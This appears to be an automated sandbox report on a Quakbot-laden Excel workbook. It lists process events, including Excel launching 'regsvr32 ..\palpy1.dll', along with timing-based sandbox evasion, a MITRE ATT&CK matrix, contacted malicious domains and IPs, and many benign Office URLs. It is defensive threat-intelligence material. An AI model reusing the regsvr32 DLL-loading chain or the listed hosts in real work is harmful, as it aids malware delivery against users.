Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: plan-515372324.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy1.dll
Source: C:\Windows\splwow64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1107
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
plan-515372324.xlsb15%VirustotalBrowse
plan-515372324.xlsb22%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
khangland.pro0%VirustotalBrowse
jaipurbynite.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
khangland.pro
103.28.39.29
truefalseunknown
jaipurbynite.com
104.244.121.13
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
    high
    https://login.microsoftonline.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
      high
      https://shell.suite.office.com:144366988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
          high
          https://autodiscover-s.outlook.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
              high
              https://cdn.entity.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                    high
                    https://powerlift.acompli.net66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v166988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                      high
                      https://cortana.ai66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                high
                                https://api.aadrm.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                  high
                                  https://api.microsoftstream.com/api/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                      high
                                      https://cr.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                          high
                                          https://graph.ppe.windows.net66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                high
                                                https://store.office.cn/addinstemplate66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                          high
                                                          https://graph.windows.net66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                      high
                                                                      https://ncus.contentsync.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                  high
                                                                                  https://management.azure.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/ios66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmedia66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/Activities66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                              high
                                                                                              https://api.office.net66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                        high
                                                                                                        https://substrate.office.com/search/api/v2/init66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
